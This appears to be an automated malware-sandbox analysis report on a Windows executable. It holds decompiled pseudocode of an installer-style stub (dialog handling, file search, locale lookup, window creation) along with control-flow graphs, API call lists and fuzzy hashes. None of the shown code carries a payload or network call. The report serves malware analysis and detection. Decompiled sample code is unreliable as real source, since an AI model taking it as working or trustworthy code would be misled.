                          control_flow_graph 707 40683d-406851 FindFirstFileW 708 406853-40685c FindClose 707->708 709 40685e 707->709 710 406860-406861 708->710 709->710
                          C-Code - Quality: 100%
                          			E0040683D(WCHAR* _a4) {
                          				void* _t2;
                          
                          				_t2 = FindFirstFileW(_a4, 0x426758); // executed
                          				if(_t2 == 0xffffffff) {
                          					return 0;
                          				}
                          				FindClose(_t2);
                          				return 0x426758;
                          			}




                          0x00406848
                          0x00406851
                          0x00000000
                          0x0040685e
                          0x00406854
                          0x00000000

                          APIs
                          • FindFirstFileW.KERNELBASE(76CDFAA0,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                          • FindClose.KERNEL32(00000000), ref: 00406854
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: XgB
                          • API String ID: 2295610775-796949446
                          • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                          • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                          • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                          • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 141 403f64-403f76 142 403f7c-403f82 141->142 143 4040dd-4040ec 141->143 142->143 146 403f88-403f91 142->146 144 40413b-404150 143->144 145 4040ee-404129 GetDlgItem * 2 call 404463 KiUserCallbackDispatcher call 40140b 143->145 148 404190-404195 call 4044af 144->148 149 404152-404155 144->149 167 40412e-404136 145->167 150 403f93-403fa0 SetWindowPos 146->150 151 403fa6-403fad 146->151 165 40419a-4041b5 148->165 153 404157-404162 call 401389 149->153 154 404188-40418a 149->154 150->151 156 403ff1-403ff7 151->156 157 403faf-403fc9 ShowWindow 151->157 153->154 181 404164-404183 SendMessageW 153->181 154->148 164 404430 154->164 161 404010-404013 156->161 162 403ff9-40400b DestroyWindow 156->162 158 4040ca-4040d8 call 4044ca 157->158 159 403fcf-403fe2 GetWindowLongW 157->159 169 404432-404439 158->169 159->158 166 403fe8-403feb ShowWindow 159->166 170 404015-404021 SetWindowLongW 161->170 171 404026-40402c 161->171 168 40440d-404413 162->168 164->169 174 4041b7-4041b9 call 40140b 165->174 175 4041be-4041c4 165->175 166->156 167->144 168->164 177 404415-40441b 168->177 170->169 171->158 180 404032-404041 GetDlgItem 171->180 174->175 178 4041ca-4041d5 175->178 179 4043ee-404407 DestroyWindow EndDialog 175->179 177->164 183 40441d-404426 ShowWindow 177->183 178->179 184 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 178->184 179->168 185 404060-404063 180->185 186 404043-40405a SendMessageW IsWindowEnabled 180->186 181->169 183->164 213 404232-40426e ShowWindow EnableWindow call 404485 EnableWindow 184->213 214 40422a-40422f 184->214 188 404065-404066 185->188 189 404068-40406b 185->189 186->164 186->185 191 404096-40409b call 40443c 188->191 192 404079-40407e 189->192 193 40406d-404073 189->193 191->158 196 4040b4-4040c4 SendMessageW 192->196 198 404080-404086 192->198 193->196 197 404075-404077 193->197 196->158 197->191 199 404088-40408e call 40140b 198->199 200 40409d-4040a6 call 40140b 198->200 209 404094 199->209 200->158 210 4040a8-4040b2 200->210 209->191 210->209 217 404270-404271 213->217 218 404273 213->218 214->213 219 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 4042a5-4042b6 SendMessageW 219->220 221 4042b8 219->221 222 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 220->222 221->222 222->165 233 404303-404305 222->233 233->165 234 40430b-40430f 233->234 235 404311-404317 234->235 236 40432e-404342 DestroyWindow 234->236 235->164 237 40431d-404323 235->237 236->168 238 404348-404375 CreateDialogParamW 236->238 237->165 239 404329 237->239 238->168 240 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->164 240->164 245 4043d4-4043ec ShowWindow call 4044af 240->245 245->168
                          C-Code - Quality: 84%
                          			E00403F64(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                          				struct HWND__* _v28;
                          				void* _v84;
                          				void* _v88;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t34;
                          				signed int _t36;
                          				signed int _t38;
                          				struct HWND__* _t48;
                          				signed int _t67;
                          				struct HWND__* _t73;
                          				signed int _t86;
                          				struct HWND__* _t91;
                          				signed int _t99;
                          				int _t103;
                          				signed int _t117;
                          				int _t118;
                          				int _t122;
                          				signed int _t124;
                          				struct HWND__* _t127;
                          				struct HWND__* _t128;
                          				int _t129;
                          				intOrPtr _t130;
                          				long _t133;
                          				int _t135;
                          				int _t136;
                          				void* _t137;
                          				void* _t145;
                          
                          				_t130 = _a8;
                          				if(_t130 == 0x110 || _t130 == 0x408) {
                          					_t34 = _a12;
                          					_t127 = _a4;
                          					__eflags = _t130 - 0x110;
                          					 *0x4236f0 = _t34;
                          					if(_t130 == 0x110) {
                          						 *0x42a228 = _t127;
                          						 *0x423704 = GetDlgItem(_t127, 1);
                          						_t91 = GetDlgItem(_t127, 2);
                          						_push(0xffffffff);
                          						_push(0x1c);
                          						 *0x4216d0 = _t91;
                          						E00404463(_t127);
                          						SetClassLongW(_t127, 0xfffffff2,  *0x429208); // executed
                          						 *0x4291ec = E0040140B(4);
                          						_t34 = 1;
                          						__eflags = 1;
                          						 *0x4236f0 = 1;
                          					}
                          					_t124 =  *0x40a368; // 0x0
                          					_t136 = 0;
                          					_t133 = (_t124 << 6) +  *0x42a240;
                          					__eflags = _t124;
                          					if(_t124 < 0) {
                          						L36:
                          						E004044AF(0x40b);
                          						while(1) {
                          							_t36 =  *0x4236f0;
                          							 *0x40a368 =  *0x40a368 + _t36;
                          							_t133 = _t133 + (_t36 << 6);
                          							_t38 =  *0x40a368; // 0x0
                          							__eflags = _t38 -  *0x42a244;
                          							if(_t38 ==  *0x42a244) {
                          								E0040140B(1);
                          							}
                          							__eflags =  *0x4291ec - _t136;
                          							if( *0x4291ec != _t136) {
                          								break;
                          							}
                          							__eflags =  *0x40a368 -  *0x42a244; // 0x0
                          							if(__eflags >= 0) {
                          								break;
                          							}
                          							_t117 =  *(_t133 + 0x14);
                          							E00406544(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                          							_push( *((intOrPtr*)(_t133 + 0x20)));
                          							_push(0xfffffc19);
                          							E00404463(_t127);
                          							_push( *((intOrPtr*)(_t133 + 0x1c)));
                          							_push(0xfffffc1b);
                          							E00404463(_t127);
                          							_push( *((intOrPtr*)(_t133 + 0x28)));
                          							_push(0xfffffc1a);
                          							E00404463(_t127);
                          							_t48 = GetDlgItem(_t127, 3);
                          							__eflags =  *0x42a2ac - _t136;
                          							_v28 = _t48;
                          							if( *0x42a2ac != _t136) {
                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                          								__eflags = _t117;
                          							}
                          							ShowWindow(_t48, _t117 & 0x00000008);
                          							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                          							E00404485(_t117 & 0x00000002);
                          							_t118 = _t117 & 0x00000004;
                          							EnableWindow( *0x4216d0, _t118);
                          							__eflags = _t118 - _t136;
                          							if(_t118 == _t136) {
                          								_push(1);
                          							} else {
                          								_push(_t136);
                          							}
                          							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                          							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                          							__eflags =  *0x42a2ac - _t136;
                          							if( *0x42a2ac == _t136) {
                          								_push( *0x423704);
                          							} else {
                          								SendMessageW(_t127, 0x401, 2, _t136);
                          								_push( *0x4216d0);
                          							}
                          							E00404498();
                          							E00406507(0x423708, E00403F45());
                          							E00406544(0x423708, _t127, _t133,  &(0x423708[lstrlenW(0x423708)]),  *((intOrPtr*)(_t133 + 0x18)));
                          							SetWindowTextW(_t127, 0x423708);
                          							_push(_t136);
                          							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                          							__eflags = _t67;
                          							if(_t67 != 0) {
                          								continue;
                          							} else {
                          								__eflags =  *_t133 - _t136;
                          								if( *_t133 == _t136) {
                          									continue;
                          								}
                          								__eflags =  *(_t133 + 4) - 5;
                          								if( *(_t133 + 4) != 5) {
                          									DestroyWindow( *0x4291f8);
                          									 *0x4226e0 = _t133;
                          									__eflags =  *_t133 - _t136;
                          									if( *_t133 <= _t136) {
                          										goto L60;
                          									}
                          									_t73 = CreateDialogParamW( *0x42a220,  *_t133 +  *0x429200 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "\"F@"), _t133);
                          									__eflags = _t73 - _t136;
                          									 *0x4291f8 = _t73;
                          									if(_t73 == _t136) {
                          										goto L60;
                          									}
                          									_push( *((intOrPtr*)(_t133 + 0x2c)));
                          									_push(6);
                          									E00404463(_t73);
                          									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                          									ScreenToClient(_t127, _t137 + 0x10);
                          									SetWindowPos( *0x4291f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                          									_push(_t136);
                          									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                          									__eflags =  *0x4291ec - _t136;
                          									if( *0x4291ec != _t136) {
                          										goto L63;
                          									}
                          									ShowWindow( *0x4291f8, 8);
                          									E004044AF(0x405);
                          									goto L60;
                          								}
                          								__eflags =  *0x42a2ac - _t136;
                          								if( *0x42a2ac != _t136) {
                          									goto L63;
                          								}
                          								__eflags =  *0x42a2a0 - _t136;
                          								if( *0x42a2a0 != _t136) {
                          									continue;
                          								}
                          								goto L63;
                          							}
                          						}
                          						DestroyWindow( *0x4291f8); // executed
                          						 *0x42a228 = _t136;
                          						EndDialog(_t127,  *0x421ed8);
                          						goto L60;
                          					} else {
                          						__eflags = _t34 - 1;
                          						if(_t34 != 1) {
                          							L35:
                          							__eflags =  *_t133 - _t136;
                          							if( *_t133 == _t136) {
                          								goto L63;
                          							}
                          							goto L36;
                          						}
                          						_push(0);
                          						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                          						__eflags = _t86;
                          						if(_t86 == 0) {
                          							goto L35;
                          						}
                          						SendMessageW( *0x4291f8, 0x40f, 0, 1);
                          						__eflags =  *0x4291ec;
                          						return 0 |  *0x4291ec == 0x00000000;
                          					}
                          				} else {
                          					_t127 = _a4;
                          					_t136 = 0;
                          					if(_t130 == 0x47) {
                          						SetWindowPos( *0x4236e8, _t127, 0, 0, 0, 0, 0x13);
                          					}
                          					_t122 = _a12;
                          					if(_t130 != 5) {
                          						L8:
                          						if(_t130 != 0x40d) {
                          							__eflags = _t130 - 0x11;
                          							if(_t130 != 0x11) {
                          								__eflags = _t130 - 0x111;
                          								if(_t130 != 0x111) {
                          									goto L28;
                          								}
                          								_t135 = _t122 & 0x0000ffff;
                          								_t128 = GetDlgItem(_t127, _t135);
                          								__eflags = _t128 - _t136;
                          								if(_t128 == _t136) {
                          									L15:
                          									__eflags = _t135 - 1;
                          									if(_t135 != 1) {
                          										__eflags = _t135 - 3;
                          										if(_t135 != 3) {
                          											_t129 = 2;
                          											__eflags = _t135 - _t129;
                          											if(_t135 != _t129) {
                          												L27:
                          												SendMessageW( *0x4291f8, 0x111, _t122, _a16);
                          												goto L28;
                          											}
                          											__eflags =  *0x42a2ac - _t136;
                          											if( *0x42a2ac == _t136) {
                          												_t99 = E0040140B(3);
                          												__eflags = _t99;
                          												if(_t99 != 0) {
                          													goto L28;
                          												}
                          												 *0x421ed8 = 1;
                          												L23:
                          												_push(0x78);
                          												L24:
                          												E0040443C();
                          												goto L28;
                          											}
                          											E0040140B(_t129);
                          											 *0x421ed8 = _t129;
                          											goto L23;
                          										}
                          										__eflags =  *0x40a368 - _t136; // 0x0
                          										if(__eflags <= 0) {
                          											goto L27;
                          										}
                          										_push(0xffffffff);
                          										goto L24;
                          									}
                          									_push(_t135);
                          									goto L24;
                          								}
                          								SendMessageW(_t128, 0xf3, _t136, _t136);
                          								_t103 = IsWindowEnabled(_t128);
                          								__eflags = _t103;
                          								if(_t103 == 0) {
                          									L63:
                          									return 0;
                          								}
                          								goto L15;
                          							}
                          							SetWindowLongW(_t127, _t136, _t136);
                          							return 1;
                          						}
                          						DestroyWindow( *0x4291f8);
                          						 *0x4291f8 = _t122;
                          						L60:
                          						_t145 =  *0x425708 - _t136; // 0x0
                          						if(_t145 == 0 &&  *0x4291f8 != _t136) {
                          							ShowWindow(_t127, 0xa);
                          							 *0x425708 = 1;
                          						}
                          						goto L63;
                          					} else {
                          						asm("sbb eax, eax");
                          						ShowWindow( *0x4236e8,  ~(_t122 - 1) & 0x00000005);
                          						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                          							L28:
                          							return E004044CA(_a8, _t122, _a16);
                          						} else {
                          							ShowWindow(_t127, 4);
                          							goto L8;
                          						}
                          					}
                          				}
                          			}
































                          0x00403f6f
                          0x00403f76
                          0x004040dd
                          0x004040e1
                          0x004040e5
                          0x004040e7
                          0x004040ec
                          0x004040f7
                          0x00404102
                          0x00404107
                          0x00404109
                          0x0040410b
                          0x0040410e
                          0x00404113
                          0x00404121
                          0x0040412e
                          0x00404135
                          0x00404135
                          0x00404136
                          0x00404136
                          0x0040413b
                          0x00404141
                          0x00404148
                          0x0040414e
                          0x00404150
                          0x00404190
                          0x00404195
                          0x0040419a
                          0x0040419a
                          0x0040419f
                          0x004041a8
                          0x004041aa
                          0x004041af
                          0x004041b5
                          0x004041b9
                          0x004041b9
                          0x004041be
                          0x004041c4
                          0x00000000
                          0x00000000
                          0x004041cf
                          0x004041d5
                          0x00000000
                          0x00000000
                          0x004041de
                          0x004041e6
                          0x004041eb
                          0x004041ee
                          0x004041f4
                          0x004041f9
                          0x004041fc
                          0x00404202
                          0x00404207
                          0x0040420a
                          0x00404210
                          0x00404218
                          0x0040421e
                          0x00404224
                          0x00404228
                          0x0040422f
                          0x0040422f
                          0x0040422f
                          0x00404239
                          0x0040424b
                          0x00404257
                          0x0040425c
                          0x00404266
                          0x0040426c
                          0x0040426e
                          0x00404273
                          0x00404270
                          0x00404270
                          0x00404270
                          0x00404283
                          0x0040429b
                          0x0040429d
                          0x004042a3
                          0x004042b8
                          0x004042a5
                          0x004042ae
                          0x004042b0
                          0x004042b0
                          0x004042be
                          0x004042cf
                          0x004042e5
                          0x004042ec
                          0x004042f2
                          0x004042f6
                          0x004042fb
                          0x004042fd
                          0x00000000
                          0x00404303
                          0x00404303
                          0x00404305
                          0x00000000
                          0x00000000
                          0x0040430b
                          0x0040430f
                          0x00404334
                          0x0040433a
                          0x00404340
                          0x00404342
                          0x00000000
                          0x00000000
                          0x00404368
                          0x0040436e
                          0x00404370
                          0x00404375
                          0x00000000
                          0x00000000
                          0x0040437b
                          0x0040437e
                          0x00404381
                          0x00404398
                          0x004043a4
                          0x004043bd
                          0x004043c3
                          0x004043c7
                          0x004043cc
                          0x004043d2
                          0x00000000
                          0x00000000
                          0x004043dc
                          0x004043e7
                          0x00000000
                          0x004043e7
                          0x00404311
                          0x00404317
                          0x00000000
                          0x00000000
                          0x0040431d
                          0x00404323
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404329
                          0x004042fd
                          0x004043f4
                          0x00404400
                          0x00404407
                          0x00000000
                          0x00404152
                          0x00404152
                          0x00404155
                          0x00404188
                          0x00404188
                          0x0040418a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040418a
                          0x00404157
                          0x0040415b
                          0x00404160
                          0x00404162
                          0x00000000
                          0x00000000
                          0x00404172
                          0x0040417a
                          0x00000000
                          0x00404180
                          0x00403f88
                          0x00403f88
                          0x00403f8c
                          0x00403f91
                          0x00403fa0
                          0x00403fa0
                          0x00403fa6
                          0x00403fad
                          0x00403ff1
                          0x00403ff7
                          0x00404010
                          0x00404013
                          0x00404026
                          0x0040402c
                          0x00000000
                          0x00000000
                          0x00404032
                          0x0040403d
                          0x0040403f
                          0x00404041
                          0x00404060
                          0x00404060
                          0x00404063
                          0x00404068
                          0x0040406b
                          0x0040407b
                          0x0040407c
                          0x0040407e
                          0x004040b4
                          0x004040c4
                          0x00000000
                          0x004040c4
                          0x00404080
                          0x00404086
                          0x0040409f
                          0x004040a4
                          0x004040a6
                          0x00000000
                          0x00000000
                          0x004040a8
                          0x00404094
                          0x00404094
                          0x00404096
                          0x00404096
                          0x00000000
                          0x00404096
                          0x00404089
                          0x0040408e
                          0x00000000
                          0x0040408e
                          0x0040406d
                          0x00404073
                          0x00000000
                          0x00000000
                          0x00404075
                          0x00000000
                          0x00404075
                          0x00404065
                          0x00000000
                          0x00404065
                          0x0040404b
                          0x00404052
                          0x00404058
                          0x0040405a
                          0x00404430
                          0x00000000
                          0x00404430
                          0x00000000
                          0x0040405a
                          0x00404018
                          0x00000000
                          0x00404020
                          0x00403fff
                          0x00404005
                          0x0040440d
                          0x0040440d
                          0x00404413
                          0x00404420
                          0x00404426
                          0x00404426
                          0x00000000
                          0x00403faf
                          0x00403fb4
                          0x00403fc0
                          0x00403fc9
                          0x004040ca
                          0x00000000
                          0x00403fe8
                          0x00403feb
                          0x00000000
                          0x00403feb
                          0x00403fc9
                          0x00403fad

                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                          • ShowWindow.USER32(?), ref: 00403FC0
                          • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                          • ShowWindow.USER32(?,00000004), ref: 00403FEB
                          • DestroyWindow.USER32 ref: 00403FFF
                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                          • GetDlgItem.USER32 ref: 00404037
                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                          • IsWindowEnabled.USER32(00000000), ref: 00404052
                          • GetDlgItem.USER32 ref: 004040FD
                          • GetDlgItem.USER32 ref: 00404107
                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404121
                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                          • GetDlgItem.USER32 ref: 00404218
                          • ShowWindow.USER32(00000000,?), ref: 00404239
                          • EnableWindow.USER32(?,?), ref: 0040424B
                          • EnableWindow.USER32(?,?), ref: 00404266
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                          • EnableMenuItem.USER32 ref: 00404283
                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                          • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                          • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                          • ShowWindow.USER32(?,0000000A), ref: 00404420
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                          • String ID:
                          • API String ID: 2475350683-0
                          • Opcode ID: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
                          • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                          • Opcode Fuzzy Hash: 0f645c2587df08bd01e23aba799d426afd4c2e1534118d29ef39e58b546f5509
                          • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 248 403bb6-403bce call 4068d4 251 403bd0-403bdb GetUserDefaultUILanguage call 40644e 248->251 252 403be2-403c19 call 4063d5 248->252 255 403be0 251->255 258 403c31-403c37 lstrcatW 252->258 259 403c1b-403c2c call 4063d5 252->259 257 403c3c-403c65 call 403e8c call 405ede 255->257 265 403cf7-403cff call 405ede 257->265 266 403c6b-403c70 257->266 258->257 259->258 272 403d01-403d08 call 406544 265->272 273 403d0d-403d32 LoadImageW 265->273 266->265 267 403c76-403c9e call 4063d5 266->267 267->265 274 403ca0-403ca4 267->274 272->273 276 403db3-403dbb call 40140b 273->276 277 403d34-403d64 RegisterClassW 273->277 279 403cb6-403cc2 lstrlenW 274->279 280 403ca6-403cb3 call 405e03 274->280 288 403dc5-403dd0 call 403e8c 276->288 289 403dbd-403dc0 276->289 281 403e82 277->281 282 403d6a-403dae SystemParametersInfoW CreateWindowExW 277->282 286 403cc4-403cd2 lstrcmpiW 279->286 287 403cea-403cf2 call 405dd6 call 406507 279->287 280->279 285 403e84-403e8b 281->285 282->276 286->287 292 403cd4-403cde GetFileAttributesW 286->292 287->265 300 403dd6-403df0 ShowWindow call 406864 288->300 301 403e59-403e61 call 40563c 288->301 289->285 293 403ce0-403ce2 292->293 294 403ce4-403ce5 call 405e22 292->294 293->287 293->294 294->287 308 403df2-403df7 call 406864 300->308 309 403dfc-403e0e GetClassInfoW 300->309 306 403e63-403e69 301->306 307 403e7b-403e7d call 40140b 301->307 306->289 310 403e6f-403e76 call 40140b 306->310 307->281 308->309 313 403e10-403e20 GetClassInfoW RegisterClassW 309->313 314 403e26-403e49 DialogBoxParamW call 40140b 309->314 310->289 313->314 318 403e4e-403e57 call 403b06 314->318 318->285
                          C-Code - Quality: 96%
                          			E00403BB6(void* __eflags) {
                          				intOrPtr _v4;
                          				intOrPtr _v8;
                          				int _v12;
                          				void _v16;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t22;
                          				void* _t30;
                          				void* _t32;
                          				int _t33;
                          				void* _t36;
                          				int _t39;
                          				int _t40;
                          				int _t44;
                          				short _t63;
                          				WCHAR* _t65;
                          				signed char _t69;
                          				signed short _t73;
                          				WCHAR* _t76;
                          				intOrPtr _t82;
                          				WCHAR* _t87;
                          
                          				_t82 =  *0x42a230;
                          				_t22 = E004068D4(2);
                          				_t90 = _t22;
                          				if(_t22 == 0) {
                          					_t76 = 0x423708;
                          					L"1033" = 0x30;
                          					 *0x437002 = 0x78;
                          					 *0x437004 = 0;
                          					E004063D5(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423708, 0);
                          					__eflags =  *0x423708;
                          					if(__eflags == 0) {
                          						E004063D5(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423708, 0);
                          					}
                          					lstrcatW(L"1033", _t76);
                          				} else {
                          					_t73 =  *_t22(); // executed
                          					E0040644E(L"1033", _t73 & 0x0000ffff);
                          				}
                          				E00403E8C(_t78, _t90);
                          				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
                          				 *0x42a2a0 =  *0x42a238 & 0x00000020;
                          				 *0x42a2bc = 0x10000;
                          				if(E00405EDE(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                          					L16:
                          					if(E00405EDE(_t98, _t86) == 0) {
                          						E00406544(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                          					}
                          					_t30 = LoadImageW( *0x42a220, 0x67, 1, 0, 0, 0x8040); // executed
                          					 *0x429208 = _t30;
                          					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                          						L21:
                          						if(E0040140B(0) == 0) {
                          							_t32 = E00403E8C(_t78, __eflags);
                          							__eflags =  *0x42a2c0;
                          							if( *0x42a2c0 != 0) {
                          								_t33 = E0040563C(_t32, 0);
                          								__eflags = _t33;
                          								if(_t33 == 0) {
                          									E0040140B(1);
                          									goto L33;
                          								}
                          								__eflags =  *0x4291ec;
                          								if( *0x4291ec == 0) {
                          									E0040140B(2);
                          								}
                          								goto L22;
                          							}
                          							ShowWindow( *0x4236e8, 5); // executed
                          							_t39 = E00406864("RichEd20"); // executed
                          							__eflags = _t39;
                          							if(_t39 == 0) {
                          								E00406864("RichEd32");
                          							}
                          							_t87 = L"RichEdit20W";
                          							_t40 = GetClassInfoW(0, _t87, 0x4291c0);
                          							__eflags = _t40;
                          							if(_t40 == 0) {
                          								GetClassInfoW(0, L"RichEdit", 0x4291c0);
                          								 *0x4291e4 = _t87;
                          								RegisterClassW(0x4291c0);
                          							}
                          							_t44 = DialogBoxParamW( *0x42a220,  *0x429200 + 0x00000069 & 0x0000ffff, 0, E00403F64, 0); // executed
                          							E00403B06(E0040140B(5), 1);
                          							return _t44;
                          						}
                          						L22:
                          						_t36 = 2;
                          						return _t36;
                          					} else {
                          						_t78 =  *0x42a220;
                          						 *0x4291c4 = E00401000;
                          						 *0x4291d0 =  *0x42a220;
                          						 *0x4291d4 = _t30;
                          						 *0x4291e4 = 0x40a380;
                          						if(RegisterClassW(0x4291c0) == 0) {
                          							L33:
                          							__eflags = 0;
                          							return 0;
                          						}
                          						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                          						 *0x4236e8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a220, 0);
                          						goto L21;
                          					}
                          				} else {
                          					_t78 =  *(_t82 + 0x48);
                          					_t92 = _t78;
                          					if(_t78 == 0) {
                          						goto L16;
                          					}
                          					_t76 = 0x4281c0;
                          					E004063D5(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281c0, 0);
                          					_t63 =  *0x4281c0; // 0x43
                          					if(_t63 == 0) {
                          						goto L16;
                          					}
                          					if(_t63 == 0x22) {
                          						_t76 = 0x4281c2;
                          						 *((short*)(E00405E03(0x4281c2, 0x22))) = 0;
                          					}
                          					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                          					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                          						L15:
                          						E00406507(_t86, E00405DD6(_t76));
                          						goto L16;
                          					} else {
                          						_t69 = GetFileAttributesW(_t76);
                          						if(_t69 == 0xffffffff) {
                          							L14:
                          							E00405E22(_t76);
                          							goto L15;
                          						}
                          						_t98 = _t69 & 0x00000010;
                          						if((_t69 & 0x00000010) != 0) {
                          							goto L15;
                          						}
                          						goto L14;
                          					}
                          				}
                          			}

























                          0x00403bbc
                          0x00403bc5
                          0x00403bcc
                          0x00403bce
                          0x00403be2
                          0x00403bf4
                          0x00403bfd
                          0x00403c06
                          0x00403c0d
                          0x00403c12
                          0x00403c19
                          0x00403c2c
                          0x00403c2c
                          0x00403c37
                          0x00403bd0
                          0x00403bd0
                          0x00403bdb
                          0x00403bdb
                          0x00403c3c
                          0x00403c46
                          0x00403c4f
                          0x00403c54
                          0x00403c65
                          0x00403cf7
                          0x00403cff
                          0x00403d08
                          0x00403d08
                          0x00403d1e
                          0x00403d24
                          0x00403d32
                          0x00403db3
                          0x00403dbb
                          0x00403dc5
                          0x00403dca
                          0x00403dd0
